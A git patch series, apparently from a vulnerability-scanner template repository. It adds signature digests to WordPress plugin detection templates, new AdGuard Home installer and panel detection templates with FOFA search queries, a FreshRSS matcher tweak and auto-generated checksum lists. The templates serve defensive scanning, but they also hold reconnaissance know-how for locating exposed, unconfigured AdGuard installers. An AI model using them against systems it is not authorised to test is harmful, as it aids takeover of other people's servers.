4a0a00473045022100b9be0adfb3e32b8b176779ffa7be1cfec2f0d6abd9fdc5d2763b31f9dded454602200e8f342cdc315bfb106ef6cc941913cd2d8188f82712abd7b46672e0a2bf1082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..e582934bb4 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022069ae483ba94eef02a40cf31ad792162198aa186f8a96c253e0e64d67bdf71d36022100ee228e2e4deab2feb3b3f99720a91e8d3640d9cedabf2c81e86ad4b93aaedf33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..5ab89de333 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220401c70cdc47334101875fac6b12909d3d77326a58ce5ea07632d36818dda8d8802203abed0979ecfd0397ec797124031d1d2509e3b4607ae3ebd381f52aa143c2e57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..91e5b67592 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210084b366ca68c98e308be8f033816004f589c0c26504b74d90994362ba5b74439f022100bb108af284c5fbdfec6f1cf3bc928df8f9c1444acd272d47cfac0be11d020b2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..fc965ea4ae 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040b343a7341cbee226d1b3418de3fb173e18e765954d3c7f8e354171b6ca83cc022100dc1d315180b1c79dc9e730394e9dbf874ba446bce0047d56189eaa0842848371:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..5f3c4ffd57 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207c1702d774c1412ce45aad8898bd0d9fa929fcefafd669be333dd18bb85ee311022100b6b19f7e6db7debe9ad05e2a0c17be63789f2848c0824b4d3218c8a894120866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..0fff413175 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cf3ca42218d5720d8de7104331683cda689a54518743be882a5b65f547241e58022100f3f298a67ebb90861bbbdefb8e6284d3cbead2cbf31cd224ca22855d66cda654:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..6791d687f2 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f8f070461594d12551d675921bcbf090bbf8567ae4d36b2d31bee172e92c1a70221009001a8ff814f4bdd1f4ea4e7e8bda70894acf4e1d9a128d3f7ab87dbc14d6ada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..879389c243 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220019eef868786b7e3a7f8bbc22434c8eca007bdb77dc16eb07239a170c9e50ceb02210090e0c41a63d64212c03f8531e913d13cdd68069f9a7bde808e4f996121f784fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..269dc70306 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008c1eb3991840ad6f70c466e719b15645de6cc2839227cc7404fadab608c72ffd02205eac5299c79c1d7cc3f078f733947ec16a9c08aa7b6535350698fff97c93d373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..fe355e046a 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a81558b769498f286557f8a59a5b6c4c483c30808dcb5524a2c1ee97b3c66f17022100d313933610743418c274f3cb33b82ada008046157e5594ca151b10f60e2390fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..084dc7a99d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eed3f82d09dd1db2f9112289822f281bf652cd522cef3614d5df68c5314f8b68022100971414efbc452552685c1f018aa3a93bdd58c375222a3e2edd9bda98dd1badd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..7234708d44 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f22c9129ca5d98a4420f41a9ad5e2f0300cbd6888f002710b172b3fd419a92f502206f2fed69ea42f30c85482ac38773b931614d0781103d9c8076f39c291b31ce01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..7102985b34 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022042595e7d49d3294e06d930e1df0860c1520a0ab606e470216814c3184c09ee5f02200eff10fdda45e68daa23e3b8978591f2dcad6c52bb47497f1ea752b400b5f02a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..f76b130ff4 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220445e0a74641e4cedd3922fcebdc6b4e440b9049414002d511c42a970ba182c2c0220297416b098f091f5de295c0e71ca361476232c947d37899f95c0e5d4300b272a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..5e5962b21e 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d2f9191c85799b2b64932449795eeb941d9bdf7be1c06e5c90cbe9d6fc03c10b0220439381c20a96bdf7f68ee4481d2640f56e046f8e4310bd89d7b6c0432063cffe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..b5665aaa01 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a8b2d6719dda34bc45ea6f9d8dc8a1e34c0e35ad7980f855f049eff195214b8d02203ff686548492d00e86e943ba820784a516c6210ba7752ce48fb2ac8f82eda611:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..52bd9c277e 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ce981da9b7215aa6b1f264a82efdafb46513dda4d35f323c110a1daf28f150a0220252b6d3ae5129f389947d27d7cdac18c81b406e1688911b6a87b2853df0fd55c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..0ddf157335 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022042a9b30f45af14387f036d052f4e9552534dddfb398693b0cd47d556f86cff3f02207be535d94ff0b170ec8998ea6181c44af12ee7d0321b793568568550953b6591:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..83b476419c 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202946480af5d7660351c95e7474a59b5c92c7a636f942a1e56cf6e83c07cd677502205e2ec7be1d7c89beb9f9de97167e0982d3f955492df861194b6f0f4816aff5ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..6c3db127ad 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fb14f2ef461abfc2344a63c0d86e3359b42ce7d6cdb2fd4be290b20b1101de1502210093fdc705c446ca3ac22146588d4a5735bfbabc0e4dd93ff12ce70cb1c26b3d5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..33c32bded9 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202399c3c3e8333cd49230461f2f07463ea6ea681d853e064d64fb854a09dfc4c9022100ad733b893e5709ad5101d5cc3b11de80b2f23916b656278e92c27e9475128c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..da9a3cd859 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022004018ead2c366d9f288b995a6f367f85e015235bf692a723503dd7cc466b942c02210083dff94e6101509dbe7a6ff97579c783428fb33af6963f1ddbe6ba7c19e4f23f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..3d826fbeab 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070334cac171fb979d6dbc659ea6c61ac6d5678801831a7005593bc423769d61c0220265e8eb5069c67c85ddf09e690dc1d35bc38629767a9c15479fbb825d1573c0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..a23a428069 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f9f07b16e638ed961f0eb6e841ef828412b7946ac9f7d713797b3bfb9e3da48b022007f4001059f14091ba344ac34a459cc2a29faadd4f7744621149a62cf0979686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 206a67ebbe97be52e69e57263378cda86c6a6ec8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 18 Jul 2024 10:08:34 +0530 Subject: [PATCH 1351/1841] Create adguard-installer.yaml --- .../installer/adguard-installer.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/misconfiguration/installer/adguard-installer.yaml diff --git a/http/misconfiguration/installer/adguard-installer.yaml b/http/misconfiguration/installer/adguard-installer.yaml new file mode 100644 index 0000000000..4e7e242d24 --- /dev/null +++ b/http/misconfiguration/installer/adguard-installer.yaml @@ -0,0 +1,29 @@ +id: adguard-installer + +info: + name: AdGuard - Installation + author: ritikchaddha + severity: high + description: | + AdGuard Installation panel has been exposed. + metadata: + max-request: 1 + verified: true + fofa-query: title="Setup AdGuard Home" + tags: adguard,misconfig,install + +http: + - method: GET + path: + - "{{BaseURL}}/install.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Setup AdGuard Home' + + - type: status + status: + - 200 From 9b043def47b24ce7d1aaf257b6c8c3baaeedb160 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 18 Jul 2024 10:18:12 +0530 Subject: [PATCH 1352/1841] Create adguard-panel.yaml --- http/exposed-panels/adguard-panel.yaml | 32 ++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/exposed-panels/adguard-panel.yaml diff --git a/http/exposed-panels/adguard-panel.yaml b/http/exposed-panels/adguard-panel.yaml new file mode 100644 index 0000000000..0f40d77b89 --- /dev/null +++ b/http/exposed-panels/adguard-panel.yaml @@ -0,0 +1,32 @@ +id: adguard-panel + +info: + name: AdGuard Panel - Detect + author: ritikchaddha + severity: info + description: | + AdGuard panel has been detected. + metadata: + max-request: 1 + verified: true + fofa-query: title="AdGuard Home" + tags: adguard,panel,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'AdGuard Home' + + - type: status + status: + - 200 From 14915f09a43a124c189ffb0c8f521677e14a6a39 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 18 Jul 2024 10:41:23 +0530 Subject: [PATCH 1353/1841] matcher update --- http/misconfiguration/freshrss-unauth.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/freshrss-unauth.yaml b/http/misconfiguration/freshrss-unauth.yaml index a7591995a3..6f240e5cb8 100644 --- a/http/misconfiguration/freshrss-unauth.yaml +++ b/http/misconfiguration/freshrss-unauth.yaml @@ -24,7 +24,7 @@ http: words: - 'a=logout' - 'FreshRSS' - - 'Profil' + - 'c=user&a=profile' condition: and - type: status From 500880860a4c6f0426d0a163fc97a9e3d20828ad Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 05:51:45 +0000 Subject: [PATCH 1354/1841] Auto Generated New Template Addition List [Thu Jul 18 05:51:45 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 599faf2887..bdba98d14f 100644 --- a/.new-additions +++ b/.new-additions @@ -12,11 +12,13 @@ http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml http/cves/2024/CVE-2024-6289.yaml +http/exposed-panels/adguard-panel.yaml http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml http/exposures/files/adcs-certificate.yaml +http/misconfiguration/installer/adguard-installer.yaml http/misconfiguration/servicenow-title-injection.yaml http/technologies/apache/apache-ozone-detect.yaml http/technologies/wordpress/plugins/wp-crontrol.yaml From d44aa779077200bc015c60c17ccccc6fb92cf1b2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 05:51:49 +0000 Subject: [PATCH 1355/1841] Auto Generated Templates Checksum [Thu Jul 18 05:51:49 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a1286ac7b1..3ead0ed661 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3497,7 +3497,7 @@ http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 -http/cves/2024/CVE-2024-4577.yaml:953a81386c373bf33e7bb441b110a6f5b44a36dd +http/cves/2024/CVE-2024-4577.yaml:b256c274afc84e3b8b73d54740a9f2e77c8e4ee6 http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 http/cves/2024/CVE-2024-4879.yaml:d7145baebf2f66d94413b3508aef384bfe691b3f http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a @@ -3721,6 +3721,7 @@ http/exposed-panels/activemq-panel.yaml:0675006d3342a2ddfee56254376feb15359099f7 http/exposed-panels/acunetix-login.yaml:bf512b02e3ce26629e30832a4e6cd11b01c0a517 http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870 http/exposed-panels/addonfinance-portal.yaml:28a7f3d98134a544c4c8bce4153606da4ea7da78 +http/exposed-panels/adguard-panel.yaml:a4216d89dd47a14a4f77629cb54da8a9b59c65f9 http/exposed-panels/adhoc-transfer-panel.yaml:d865eadf819552085319ebae3057f45afc659d24 http/exposed-panels/adiscon-loganalyzer.yaml:ad4702b4089560080d43afd9c1b6dd643ca7b9bb http/exposed-panels/adminer-panel-detect.yaml:411ab492b25f6a7fa2c56b7aae4deb3877903e72 @@ -7294,229 +7295,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:dd1ab7bd15d2f942860074930bb21c08dd182085 +http/technologies/wordpress/plugins/add-to-any.yaml:748b97de00055b19c1ab04572b300e69e13aabbe +http/technologies/wordpress/plugins/admin-menu-editor.yaml:a5a4bfa7c0568152af9d5224aeefba1b4949be19 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:92132478295377132aac2fe656c4e9f328f75fc8 +http/technologies/wordpress/plugins/akismet.yaml:3c3f3ab7fe0b244f2fe459acc48ba37ab9925617 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:158cd19470a0af5c64828ff5125a39ad10057ef3 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:62bf79663a3de9ab14fa286940501870c6afd6d2 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:9c3134a7651c24053a20cc5863a8e4d53db49338 +http/technologies/wordpress/plugins/amp.yaml:2b99fe3c44067235b77c560b482d726e58fa1168 +http/technologies/wordpress/plugins/antispam-bee.yaml:a78daee911360ef2a92452acc9c344e3123730ba +http/technologies/wordpress/plugins/astra-sites.yaml:6173df41bcca1a90814d3dd8905e7d64fc376030 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:6912a4b8d4d2bb84964c58b10081054d7e3a98c8 +http/technologies/wordpress/plugins/backwpup.yaml:6dbbeaed387071cee2308803ace60dbae9265345 +http/technologies/wordpress/plugins/better-search-replace.yaml:e60cb1425e7185e48bbfc235fcb5c9e50e10e525 +http/technologies/wordpress/plugins/better-wp-security.yaml:c212a433a5209c8e4d8210ea41d65bddafa4f5a3 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:409428a7d77b039084ebcec0284a5ee0d0992928 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:fcf1f6aa3fbc2b79d0ee3f810bcbca44616efe06 +http/technologies/wordpress/plugins/breeze.yaml:2582e5883972f55e79e49b22bf3c91dbe98e9da5 +http/technologies/wordpress/plugins/broken-link-checker.yaml:e9477b621c7bd5051a0f5576f7c2c3be1dd177dc +http/technologies/wordpress/plugins/chaty.yaml:6bf3fd8e9b8e49b09262da3e10b4c3d68bf0e8dd +http/technologies/wordpress/plugins/child-theme-configurator.yaml:77366cc87a8fb921ad36ba1be8decdfa1871623d +http/technologies/wordpress/plugins/classic-editor.yaml:45c9c6f69bd78cc3cce89fee5e2fdaf34b4e7ada +http/technologies/wordpress/plugins/classic-widgets.yaml:cd68f5ab82430b2c3bffda4e149be5966f6ccc26 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:f8607304b34e93ba2f208b710dc16ac29272c918 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c 